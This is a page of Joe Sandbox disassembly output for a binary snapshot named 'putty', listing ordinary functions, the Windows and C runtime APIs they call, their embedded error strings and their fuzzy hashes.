Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 73090415-0
Opcode ID: b3cec50c0fff36c5386c1059d19b993e13240253ca9063937a039d88d12b43b7
Instruction ID: 4d7113913c63fdb4ab4547c78ea48916496e6ea99ed38d0ea8f4351af6f62c51
Opcode Fuzzy Hash: b3cec50c0fff36c5386c1059d19b993e13240253ca9063937a039d88d12b43b7
Instruction Fuzzy Hash: F311E2B29047459FC711DF999880ADEFBF8FB18300F40462FE555A3640D7746608CBA5

Function 00326860 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationsleepfileCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00326876
ReleaseMutex.KERNEL32(?), ref: 0032688E
Sleep.KERNEL32(00000064), ref: 0032689A
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 003268BB

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: FileMutexObjectReleaseSingleSleepWaitWrite
String ID:
API String ID: 2232514769-0
Opcode ID: f403853ccadc09a3c6244b9f3a34477784448510dc4fe971bf711970c8d81cd4
Instruction ID: 28207e2a73e0191dada24cfd999965ddf96b93c8874123c8a03dcf0d125e4a30
Opcode Fuzzy Hash: f403853ccadc09a3c6244b9f3a34477784448510dc4fe971bf711970c8d81cd4
Instruction Fuzzy Hash: 5401A276605204AFD714DBA6EC85FABB7ACEF84320F144509F94587290C670ED008760

Function 00323CE0 Relevance: 6.0, APIs: 4, Instructions: 37filestringCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(00000000,?,00000000,00323CB6,?,00000000,000000FF), ref: 00323CE8
lstrcmpW.KERNEL32(00000000,003ECB4C,76130B20,?,00000000,000000FF), ref: 00323D07
lstrcmpW.KERNEL32(00000000,003ECB50,?,00000000,000000FF), ref: 00323D17
FindNextFileW.KERNEL32(?,?,?,00000000,000000FF), ref: 00323D25

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: FileFindNextlstrcmp
String ID:
API String ID: 3014175339-0
Opcode ID: cb3f6f058206cbe09ffbf6e737810c1c3e5049d803e9435b105e92cbb5c1ebde
Instruction ID: 889b3679adefbd3c6c22113b75bc2437ae0a0ee78badf0a760002c509110f111
Opcode Fuzzy Hash: cb3f6f058206cbe09ffbf6e737810c1c3e5049d803e9435b105e92cbb5c1ebde
Instruction Fuzzy Hash: AFF054712553926ACB329B78BD48E977BACBB96B057001E1DF487D3045D634E407CB20

Function 003408D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

Part of subcall function 00340870: _memmove.LIBCMT ref: 003408B2

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

std::_Xinvalid_argument.LIBCPMT ref: 00340B76

Strings

[device]: unable to refresh device capabilities., xrefs: 00340AFB
vector<T> too long, xrefs: 00340B71

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argument_malloc_memmovestd::_
String ID: [device]: unable to refresh device capabilities.$vector<T> too long
API String ID: 1664685438-1188664144
Opcode ID: fe4a7872f6bdd3d259f002773916ad841a15192b1375540eb8730590d09b9353
Instruction ID: 91953d7e4360a7351959735242414525969826fe91e63f3d24550b5d06192a8d
Opcode Fuzzy Hash: fe4a7872f6bdd3d259f002773916ad841a15192b1375540eb8730590d09b9353
Instruction Fuzzy Hash: 38919F717043018FCB29DF28C880A2AB3E5EF94714F158A2DEA969F791D770F945CB91

Function 003351D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00335348

Strings

vector<T> too long, xrefs: 00335343, 003353AD
`N3, xrefs: 00335491, 00335498

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: `N3$vector<T> too long
API String ID: 909987262-3513108928
Opcode ID: e0176fe842502467898821fd0faf243560bb49770bf5fa4b6539a7413cd58aa1
Instruction ID: 59304d255a85159712b40a5e5053057c2baf59d7cc51fc67cacd0de4346d515f
Opcode Fuzzy Hash: e0176fe842502467898821fd0faf243560bb49770bf5fa4b6539a7413cd58aa1
Instruction Fuzzy Hash: A181A175604B019FCB1ACF29C8C0A2AB7E1FBC8355F568A2DE85997254E730ED44CB92

Function 00345880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

Out of Memory, xrefs: 00345A78
Image is too high to process with png_read_png(), xrefs: 003458AF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: Image is too high to process with png_read_png()$Out of Memory
API String ID: 0-1913111953
Opcode ID: f7aeb4ca43873b1ef8554408e16ff1ecab0c138e5f1fb1257390a90db8873e67
Instruction ID: 6c72938b4ce6b45a014ab4571e92c7c1cf60268c0c54a066f3ab19d19f794d4c
Opcode Fuzzy Hash: f7aeb4ca43873b1ef8554408e16ff1ecab0c138e5f1fb1257390a90db8873e67
Instruction Fuzzy Hash: AD51C270A01F019BE32BCA24D5967A7FBE0AF01714F094A1DDAAB8E1A3D774F945C740

Function 0032F610 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

std::exception::exception.LIBCMT ref: 0032F7A9
__CxxThrowException@8.LIBCMT ref: 0032F7BE

Strings

\-@, xrefs: 0032F7B3, 0032F7B6

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: \-@
API String ID: 4063778783-3423671737
Opcode ID: ecc22e4904cad29057d125b92fbb79c758011c06bd3f6b108397b81dc35f3b01
Instruction ID: 21bd21410f9f51dc1027752ea5c065b3842c9b478c8c0da992df41fbbf7d72d3
Opcode Fuzzy Hash: ecc22e4904cad29057d125b92fbb79c758011c06bd3f6b108397b81dc35f3b01
Instruction Fuzzy Hash: 45513BB5800269DFDB06EF94DC45BDEBBF8FB09704F000A6AE514AB791D7B45608CBA1

Function 00333210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00333227
_memset.LIBCMT ref: 0033337D

Strings

CD001, xrefs: 00333340

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: CD001
API String ID: 2102423945-1744095671
Opcode ID: c0054725830c6bcee491531fe450a98b9004facdcd278ee6eccf32535114b0d8
Instruction ID: b65bcbbb304e6d50afd566fedb3fa28efdae32bb47d18a23f515f9349bf4bb73
Opcode Fuzzy Hash: c0054725830c6bcee491531fe450a98b9004facdcd278ee6eccf32535114b0d8
Instruction Fuzzy Hash: 6C515F744097858AFB32CFB894943CBBFA2AF56304F04599CD5E99B382C3B65508CBD2

Function 00338050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 003380C5
_memmove.LIBCMT ref: 00338116

Part of subcall function 00322C30: std::_Xinvalid_argument.LIBCPMT ref: 00322C4A

Strings

string too long, xrefs: 003380C0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 1cfc2d7ec8335ee8bb2851e5db1ca65b3cb7f97ec61d94ad7a3767df7467a39e
Instruction ID: 5f63dc1c936c370e3bf3c42f1cbb4c41ead049d85713c07c968b1deab323c656
Opcode Fuzzy Hash: 1cfc2d7ec8335ee8bb2851e5db1ca65b3cb7f97ec61d94ad7a3767df7467a39e
Instruction Fuzzy Hash: 0231A432710710ABD72A9F5CECC096AF7E9EBA1760F20451BF5818B741CB629C4583A1

Function 00321BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321C53
_memmove.LIBCMT ref: 00321CAD

Strings

string too long, xrefs: 00321C4E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 2cc4f6c76923d242989c8885e7b825be9e53492919270f0aabdab6561ce4983c
Instruction ID: f8fc8dbc5354a35086ec5bbd1bcde3f3617f78c658c41d9ef79d40632f6c4f58
Opcode Fuzzy Hash: 2cc4f6c76923d242989c8885e7b825be9e53492919270f0aabdab6561ce4983c
Instruction Fuzzy Hash: B231C4363646308B8B269E5CF98086EF3EAEFE5751320492FE042CB650D731EC45C7A4

Function 00331140 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033116E
GetTimeZoneInformation.KERNEL32(?,?,CCCCCCC3,?), ref: 003311CB

Strings

., xrefs: 00331231

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InformationTimeZone_memset
String ID: .
API String ID: 1673874568-248832578
Opcode ID: 4ffc3bad2ea7fef4f30961f0dbc1d1ac298ccf9f16576599b5d8ceed5f5bf8f3
Instruction ID: e540c22cf2b051482eb177cbe6c08572b1a1bad160a3138f8540ab03a7ae8fd5
Opcode Fuzzy Hash: 4ffc3bad2ea7fef4f30961f0dbc1d1ac298ccf9f16576599b5d8ceed5f5bf8f3
Instruction Fuzzy Hash: AC410674A042589FCB25CFA9C890BDEBBB1BF58300F14819AE489A7352DB749A85CF51

Function 00323570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001100,00000000,?,00000000,00000000,00000001,00000000,D747BB9A,00000000), ref: 003235F9
LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00323634

Part of subcall function 003251A0: _vwprintf.LIBCMT ref: 003251AC

Strings

<no error description available>, xrefs: 00323651

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: FormatFreeLocalMessage_vwprintf
String ID: <no error description available>
API String ID: 67517400-55999512
Opcode ID: d95e8c8aaef5291b0df37b8006c84bc32abd963f4d2d8be3f7319f87e91232ba
Instruction ID: 3740100231979ab47078caa9bd41cac3b5467bbce6e801118f4bedfaa239f1d0
Opcode Fuzzy Hash: d95e8c8aaef5291b0df37b8006c84bc32abd963f4d2d8be3f7319f87e91232ba
Instruction Fuzzy Hash: 3E319EB1E10218ABDB11DF99ED85EEEF7B9FF88B10F10421AF405A7290DB746A04CB51

Function 0033D210 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 0033D2E3

Strings

", xrefs: 0033D2C2
wwww, xrefs: 0033D2EF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InformationTimeZone
String ID: "$wwww
API String ID: 565725191-3333316868
Opcode ID: d6d0b17791196f3ec57ed7187b7a22675941c31ecd830ecca6f636ad67d11220
Instruction ID: 8c362c8e6f3189ee3649d5a041fcdce70b1b173308c08502ada42e49c36e3289
Opcode Fuzzy Hash: d6d0b17791196f3ec57ed7187b7a22675941c31ecd830ecca6f636ad67d11220
Instruction Fuzzy Hash: 87412F61D092CACECB16CBFC85416EEBFB19F29200F0845ADD485B7743C1755748CBA5

Function 00347590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003475B6
__floor_pentium4.LIBCMT ref: 00347646

Strings

Out of Memory, xrefs: 003475CB

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: __floor_pentium4_malloc
String ID: Out of Memory
API String ID: 2431536261-774281260
Opcode ID: c2ba731946cfd84127bd5a7bf216e23ad61fd732acc17751caf2b6de7a08a8d4
Instruction ID: c4bca8b2d2350b168f043a98e708001e08e10d99f794fa2b8e1d47512cabea22
Opcode Fuzzy Hash: c2ba731946cfd84127bd5a7bf216e23ad61fd732acc17751caf2b6de7a08a8d4
Instruction Fuzzy Hash: 9D314830A086089BDB135F69E8416BEBBF8EF41351F1242A5ED55DE250D738A991C360

Function 0032E370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

std::exception::exception.LIBCMT ref: 0032E453
__CxxThrowException@8.LIBCMT ref: 0032E468

Part of subcall function 00321780: std::_Xinvalid_argument.LIBCPMT ref: 0032179A

Part of subcall function 003237F0: _memmove.LIBCMT ref: 00323832

Strings

\-@, xrefs: 0032E45D, 0032E460

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
